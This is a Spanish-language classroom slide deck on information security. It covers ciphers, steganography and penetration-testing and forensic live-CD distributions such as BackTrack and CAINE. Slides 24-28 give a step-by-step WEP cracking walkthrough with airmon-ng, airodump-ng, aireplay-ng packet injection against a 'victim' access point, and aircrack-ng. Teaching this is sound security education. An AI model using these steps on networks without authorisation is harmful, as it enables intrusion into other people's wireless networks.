Seguridad informatica (live cd) 1.2

1,411 views

Published on

Distribuciones Live CD de Seguridad Informática.

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,411
On SlideShare
0
From Embeds
0
Number of Embeds
11
Actions
Shares
0
Downloads
41
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Seguridad informatica (live cd) 1.2

  1. 1. SEGURIDAD INFORMÁTICA Distribuciones Live-CD Prof. Manuel Mujica manuel@ubuntu.org.ve
  2. 2. CONTENIDO ¿Qué es seguridad de la información? ¿Por qué seguridad informática? Modelos de ataques Criptografía Esteganografía Distribuciones Live-CD Ejemplos
  3. 3. ¿Qué es Seguridad de la Información? Seguridad de información es mucho más que establecer“firewalls”, aplicar parches para corregir nuevas vulnerabilidades en el sistema de software, o guardar en la bóveda los “backups”.Seguridad de información es determinar qué requiere ser protegido y por qué, de qué debe ser protegido y cómo protegerlo.
  4. 4. ¿Qué es Seguridad de la Información?La seguridad de información se caracteriza por la preservación de:CONFIDENCIALIDAD : La información está protegida depersonas no autorizadas.INTEGRIDAD : La información está como se pretende, sinmodificaciones inapropiadas.DISPONIBILIDAD : Los usuarios tienen acceso a la informacióny a los activos asociados cuando lo requieran.
  5. 5. ¿Por qué seguridad informática? RSA, la División de Seguridad de EMC (NYSE: EMC), anunciólos resultados de la Encuesta mundial sobre seguridad delconsumidor en línea del año 2010: 92% realizó una transacciónbancaria en línea y el 80% realizó una compra en línea. Un reciente estudio de Federal Deposit Insurance Corporation(FDIC) indica que durante el último trimestre de 2009, losciberdelincuentes robaron más de 150 millones de dólares decuentas bancarias de pequeñas y medianas empresasnorteamericanas.
  6. 6. Modelos de AtaquesE R E R I I Intercepción Modificación E R E R E: Emisor I I R: Receptor I: Intruso Fabricación Interrupción
  7. 7. Criptografía Técnica para ocultar y así proteger información Técnica para ocultar y así proteger información mientras permanece en disco mientras permanece en disco o mientras está en tránsito o mientras está en tránsitoSubstitución: Cambia un carácter por uno o varios caracteres M U R C I E L A GO 0 1 2 3 4 5 6 7 8 9 Hola como estas H967 3909 5ST7S
  8. 8. CriptografíaSubstitución.Sustituir un elemento del alfabeto del texto-plano por uno que corres-ponde al alfabeto del texto-cifrado.El alfabeto latino, que consta de 29 letras: A, B, C, Ch, D, E, F, G, H, I,J, K, L, Ll, M, N, Ñ, O, P, Q, R, S, T, U, V, W, X, Y y Z Texto-plano: UNIVERSIDAD Texto-cifrado: XPLYHUVLGChG
  9. 9. CriptografíaTransposición (Permutación). Permuta los caracteres del texto plano. Texto-plano: ESTE ES UN MENSAJE DE PRUEBA! Texto-cifrado: EUAR SNJU TMEE EEDB ENEA SSP! E S T E E S U NM E N S A J E D E P R U E B A !
  10. 10. EsteganografíaEl término "esteganografía" viene del griego stegos, que signi-fica "cubierta", por lo que esteganografía significaría "escritu-ra oculta" o "escritura encubierta".Así pues, la esteganografía es el conjunto de técnicas que per-miten ocultar o camuflar la información.Nótese que la criptografía modifica los datos para que no seanlegibles, a diferencia de la esteganografía, que simplemente lostoma y los oculta entre otros datos.La esteganografía se utiliza para crear canales encubiertos(covert channels) y marcas de agua (watermarks) para protegerderechos de autor.
  11. 11. Esteganografía
  12. 12. Distribuciones Live-CD
  13. 13. nUbuntunUbuntu o Network Ubuntu es un proyecto para tomar ladistribución Ubuntu existente y reconvertirla en un LiveCD einstalación completa con las herramientas necesarias para realizarpruebas de penetración en servidores y redes.La distro incluye algunos de los programas de seguridad paraLinux más usados, tales como Ethereal, nmap, dSniff, yEttercap.Distribución GNU/Linux Fuente: http://www.nubuntu.org
  14. 14. CAINECAINE (Computer Aided INvestigative Environment) es unadistribución GNU/Linux de origen italiano. Creado como unproyecto de Ingeniería Forense.Proporciona: Fácil interoperabilidad durante todo el análisis (Preservación, Recolección, Análisis, Reportes). Amigable entorno gráfico. Ubuntu como sistema base. Generación semi-automática de reportes.
  15. 15. CAINEAlgunas herramientas incluidas: Grissom Analyzer Automated Image & Restore (AIR) Guymager Foremost and Scalpel Autopsy 2.20 and TSK 3.0 SFDumper Fundl Stegdetect OphcrackCAINE es Open Source Fuente: http://www.caine-live.net/
  16. 16. BackTrackBackTrack es una distribución GNU/Linux en formato Live-CDpensada y diseñada para la auditoría de seguridad y relacionadacon la seguridad informática en general.Se deriva de la unión de dos grandes distribuciones orientadas a laseguridad, el Auditor + WHAX.Sistema base Ubuntu.
  17. 17. BackTrackIncluye una larga lista de herramientas de seguridad listas parausar, entre las que destacan numerosos scanners de puertos yvulnerabilidades, archivos de exploits, sniffers, herramientasde análisis forense y herramientas para la auditoría Wireless.Fuente: http://www.backtrack-linux.org/
  18. 18. BackTrackLista de Herramientas: Recolección de Información (37) Dig, TCPtraceroute, Tctrace, Whoami. Mapeo de Redes (28) Hping, Nmap Identificación de Vulnerabilidades (65) GFI LanGuard, Nikto, SuperScan Penetración (12) OpenSSL-To-Open, Pirana Escalada de Privilegios (48) Etherape, EtterCap, Wireshark Mantenimiento de Acceso (15) Backdoors, CryptCat
  19. 19. BackTrackLista de Herramientas: Cubrimiento (1) Housekeeping Análisis de redes inalámbricas 802.11 WIFI (25): aircrack-ng, Airsnort Bluetooth (22): Btcrack, hstest VOIP & Análsis telefónico (7) SIPdump, Smap Ingeniería forence (13) Autopsy, DD_Rescue, Foremost, Rootkithunter Ingeniería Inversa (7) GDB GNU Debugger, GDB Console GUI Servicios (1) SNORT
  20. 20. Ejemplos: steghideAdjuntar adj.txt en cvr.jpg:#steghide embed -cf cvr.jpg -ef adj.txtExtraer datos adjuntos desde cvr.jpg:#steghide extract -sf cvr.jpg
  21. 21. Ejemplos: wireshark
  22. 22. Nikto
  23. 23. Nikto
  24. 24. Ejemplos: crack wep wifiTérminos:-------------BSSID (mac del router que da la señal)PWR (Poder de señal)CHN (Canal que se encuentra la red)ENCR (Es el tipo de contraseña que tiene la red)ESSID (Nombre de la red inalámbrica).
  25. 25. Ejemplos: crack wep wifiCaso 1: Red sin Filtro de MAC:Abrimos una Terminal (consola 1):1. Ponemos la tarjeta en modo monitor con airmon-ngairmon-ng start [nombre tarjeta inalámbrica] --> wlan0, wlan1,ath0,.Ejemplo:#airmon-ng start wlan0En modo monitor, la tarjeta quedara renombrada como: mon0 omon1
  26. 26. Ejemplos: crack wep wifiCaso 1: Red sin Filtro de MAC:2. Escaneamos las redes wireless con airodump-ngairodump-ng [nombre tarjeta inalámbrica] --> mon0, mon1…..Ejemplo:#airodump-ng mon0Verificamos el canal (CH) en el que está trabajando la red al cualatacaremos.Presionamos Ctrl + c para detener el escaneo.
  27. 27. Ejemplos: crack wep wifiCaso 1: Red sin Filtro de MAC:Abrimos otra Terminal (consola 2):1. Nos asociamos a la red inalámbrica con aireplay-ngaireplay-ng -1 0 -a [MAC AP Victima] [nombre tarjeta wifi]Ejemplo:#aireplay-ng -1 0 –a 11:22:33:44:55:66 mon02. Empezamos a inyectar paquetes a la red asociada con aireplay-ngaireplay-ng -3 -b [MAC AP Victima] [nombre tarjeta wifi]Ejemplo:#aireplay-ng -3 –b 11:22:33:44:55:66 mon0
  28. 28. Ejemplos: crack wep wifiCaso 1: Red sin Filtro de MAC:Abrimos otra Terminal (consola 3):1. Una vez capturado una gran cantidad de datos (Data) vamos acrackear la red inalámbrica con aircrack-ngaircrack-ng [filename]-01.capEjemplo:#aircrack-ng wep-01.cap
  29. 29. GRACIAS POR SU ATENCIÓN "Sólo hay un bien: el conocimiento. Sólo hay un mal: la ignorancia." Sócrates.
  30. 30. http://pide.wordpress.com CONTACTO: email: manuel@ubuntu.org.ve OpenPGP keys:7661B42E http://pgp.cs.uu.nl/ Twitter: @mmujica001 Ubuntu User #4728 Linux User #439689 Blogs: http://pide.wordpress.com http://www.ubuntu-ve.org http://creativecommons.org/licenses/by/3.0/deed.es

×